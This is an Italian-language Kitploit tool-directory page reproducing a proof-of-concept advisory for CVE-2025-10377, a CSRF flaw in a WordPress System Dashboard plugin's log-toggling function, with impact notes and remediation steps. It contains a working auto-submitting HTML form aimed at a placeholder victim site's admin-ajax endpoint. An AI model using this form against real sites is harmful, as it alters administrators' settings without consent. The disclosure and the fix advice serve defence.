Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
Strumenti/GitHubGitHub/nagisayumaa/cve-2025-10377
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

Vedi Repository
0 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Prova di concetto CVE-2025-10377 Cross-Site Request Forgery (CSRF) nel Plugin System Dashboard (Funzione sd_toggle_logs)

Tipo di vulnerabilità: Cross-Site Request Forgery (CSRF)

Funzione interessata: sd_toggle_logs()

CVSS v3.1: 4.3 (Medio)
Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(Nota: il punteggio riflette un cambiamento di stato non autorizzato che richiede una vittima amministratore e l'interazione dell'utente.)

Descrizione della vulnerabilità:

La funzione sd_toggle_logs() gestisce operazioni sensibili come l'abilitazione/disabilitazione dei log di accesso alle pagine, dei log degli errori e dei log di consegna delle email. Tuttavia, si basa esclusivamente sul parametro $_REQUEST['log_type'] e su un controllo delle capacità (current_user_can( 'manage_options' )) senza implementare una protezione CSRF (ad es. check_admin_referer() o un nonce).

Di conseguenza, un attaccante può indurre un Amministratore autenticato a visitare una pagina dannosa che invia silenziosamente una richiesta appositamente costruita, causando modifiche non intenzionali di abilitazione/disabilitazione della registrazione del sito.

Impatto:

  • Modifiche non autorizzate dello stato delle funzionalità di registrazione del sito (log di accesso alle pagine, log degli errori, log di consegna delle email).

Scarica lo strumento
  • Se la registrazione degli errori è abilitata, il sito potrebbe iniziare a scrivere errori dell'applicazione in un percorso file determinato dal plugin (aumentando la probabilità di divulgazione di informazioni operative tramite i log), ma l'impatto diretto di questo problema è il cambiamento di stato stesso.

  • POC

    Quando un utente autenticato con manage_options visita la pagina dell'attaccante, la funzionalità di registrazione corrispondente viene attivata/disattivata senza consenso esplicito.

    root@kitploit:~
     <body>
        <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
          <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
          <input type="hidden" name="log&#95;type" value="errors&#95;log" />
          <input type="hidden" name="fast&#95;ajax" value="true" />
          <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    Rimedio

    • Implementare i nonce di WordPress (check_admin_referer() o wp_verify_nonce()) per validare le richieste.

    • Limitare le azioni sensibili alle sole richieste POST.

    • Evitare di fare affidamento esclusivamente sui controlli delle capacità per la protezione contro il CSRF.

    Video POC

    Se non riesci a riprodurre il problema esattamente come descritto nel report, fai riferimento alla seguente dimostrazione video (PoC) per uno scenario di riproduzione chiaro:

    https://youtu.be/WtWYIfEM4W0